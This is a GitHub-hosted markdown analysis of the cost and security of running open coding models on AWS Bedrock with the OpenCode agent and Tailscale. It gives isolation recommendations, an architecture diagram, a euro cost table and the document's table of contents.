Run OpenCode in a container or VM for true isolation (Docker recommended)
Use Bedrock as sole provider — no data leaves AWS infrastructure
Disable web search/fetch tools if not needed — reduces attack surface
Tailscale ACLs — restrict which machines can reach your Bedrock VPC endpoint
Environment-based auth — use AWS_PROFILE or IAM roles instead of hardcoded keys
Review before executing — always inspect shell commands the model suggests
.opencodeignore — exclude sensitive files/directories from the model's reach

9.8 Full Architecture: OpenCode + Bedrock + Tailscale

+----------------------------------------------------------+
|  DEVELOPER MACHINE                                       |
|                                                          |
|  +------------+     +------------------+                 |
|  | OpenCode   |---->| AWS SDK          |                 |
|  | (TUI/CLI)  |     | (credentials)    |                 |
|  +-----+------+     +--------+---------+                 |
|        |                     |                           |
|        |  MCP Servers        |  Tailscale Tunnel         |
|        v                     v                           |
|  +-----------+    +---------------------+                |
|  | Brave     |    | Tailscale Daemon    |                |
|  | Search    |    | (encrypted mesh)    |                |
|  | (local)   |    +----------+----------+                |
|  +-----------+               |                           |
+----------------------------------------------------------+
                               |
                    Encrypted WireGuard Tunnel
                               |
+----------------------------------------------------------+
|  AWS VPC (us-east-1)                                     |
|                                                          |
|  +-------------------+    +------------------+           |
|  | VPC Endpoint      |--->| Amazon Bedrock   |           |
|  | (bedrock-runtime) |    | (Qwen3/R1/etc.)  |           |
|  +-------------------+    +------------------+           |
|                                                          |
|  +-------------------+    +------------------+           |
|  | S3 Bucket         |    | CloudWatch       |           |
|  | (file storage)    |    | (logging, opt.)  |           |
|  +-------------------+    +------------------+           |
|                                                          |
|  +-------------------+                                   |
|  | Tailscale Subnet  |                                   |
|  | Router (t3.micro) |                                   |
|  +-------------------+                                   |
+----------------------------------------------------------+

Data flow:

You type a coding request in OpenCode's TUI
OpenCode sends it via AWS SDK to Bedrock through the Tailscale tunnel
Traffic enters the VPC via the Tailscale subnet router
Hits the VPC endpoint for Bedrock — never touches the public internet
Response returns through the same encrypted path
If tools are used (search, file ops), they execute locally or via MCP servers on your machine

9.9 Cost Summary (OpenCode + Bedrock + Tailscale, Solo Dev, eu-west-2, incl. 20% VAT)

Component	Monthly Cost (EUR incl. VAT)
OpenCode	€0 (open source)
Bedrock inference (Qwen3 Coder 480B, medium use)	€25.75
Tailscale Personal	€0
EC2 t3.micro (subnet router)	€10.49 (or €0 if using own machine)
VPC Endpoint	€9.28 (optional but recommended)
S3 (file storage)	€1.20
Brave Search API	€0 (free tier)
Total (minimal)	~€27/mo
Total (recommended)	~€47/mo

With multi-model strategy (Qwen3 480B primary + Qwen3 30B for quick tasks): ~€32-40/mo.

Compared to Claude Code Pro (~€22/mo incl. VAT) or Cursor Pro (~€22/mo incl. VAT), this setup costs slightly more but offers full model flexibility, open-source transparency, data residency in EU, and complete infrastructure control.

FilesExpand file tree

AWS_Coding_Model_Cost_Security_Analysis.md

Latest commit

History

AWS_Coding_Model_Cost_Security_Analysis.md

File metadata and controls

AWS State-of-the-Art Coding Model — Cost & Security Analysis

1. Model Pricing & Benchmark Quality (On-Demand, per 1K tokens)

eu-west-2 (London) — EUR pricing (incl. 20% VAT)

us-east-1 (N. Virginia) — USD reference pricing

Coding Benchmark Key

2. Usage Scenarios (Solo Developer)

3. Monthly Inference Cost by Model — eu-west-2 in EUR incl. 20% VAT (ranked by coding quality)

4. Fixed Infrastructure Costs (monthly, eu-west-2, incl. 20% VAT)

5. Total Monthly Cost & Value Efficiency (all-in, eu-west-2 in EUR incl. 20% VAT)

Total Monthly Cost (all-in, with €6 minimal infra incl. VAT, eu-west-2)

Key Insights from Leaderboard Correlation

Recommended Strategy (Solo Developer, EU-based)

5b. Power User Analysis & Claude Comparison

What Does Each Usage Level Look Like in Practice?

Heavy User Breakdown (200 req/day)

Claude Plans Pricing (April 2026, incl. 20% VAT)

Bedrock Cost at Claude-Equivalent Usage Levels (eu-west-2, EUR)

Single-model strategy (incl. 20% VAT)

Multi-model strategy (recommended for power users, incl. 20% VAT)

Head-to-Head Comparison (all prices EUR incl. 20% VAT)

When Each Option Wins

Break-Even Analysis (all EUR incl. 20% VAT)

5c. Model Mix Scenarios — Heavy & Power Users (eu-west-2, EUR)

Model Tiers

Mix Definitions

Monthly Cost by Mix (Qwen3 480B as Mid-tier, incl. 20% VAT)

Monthly Cost by Mix (Qwen3 Coder Next as Mid-tier — 17% cheaper, incl. 20% VAT)

Routing Guide — What Goes Where

Visual Cost Comparison (Heavy User, 200 req/day, incl. VAT)

Recommended Mix by Budget (incl. VAT)

Key Insight

5d. Automatic Model Routing — Open Source Solutions

Ready-Made Solutions

Routing Strategy Comparison

Recommended Architecture

6. Security Analysis — Model Isolation

6.1 How Bedrock Works

6.2 Threat Model (Inference Only, No Tools)

6.3 Isolation Levels Compared

7. Security Analysis — When the Model Uses Tools (Internet Access)

7.1 The Problem

7.2 Threat Surface by Capability

Web Search

File Download

File Upload

7.3 Mitigation Architecture

7.4 Required Safeguards

Layer 1: Tool Allowlisting

Layer 2: Domain Allowlist

Layer 3: Content Filtering

Layer 4: Upload Controls

7.5 Recommended Tool-Enabled Architecture

8. Recommendations

Model Choice

Security Posture

Golden Rule

9. OpenCode Integration

9.1 What Is OpenCode?

9.2 Why OpenCode + AWS Bedrock?

9.3 Bedrock Configuration

9.4 Built-in Tools

9.5 MCP Server Integration

9.6 Comparison with Alternatives

9.7 Security Considerations for OpenCode

What OpenCode Can Access

Risk Matrix (OpenCode + Bedrock + Tailscale)

Recommended Security Configuration

9.8 Full Architecture: OpenCode + Bedrock + Tailscale

9.9 Cost Summary (OpenCode + Bedrock + Tailscale, Solo Dev, eu-west-2, incl. 20% VAT)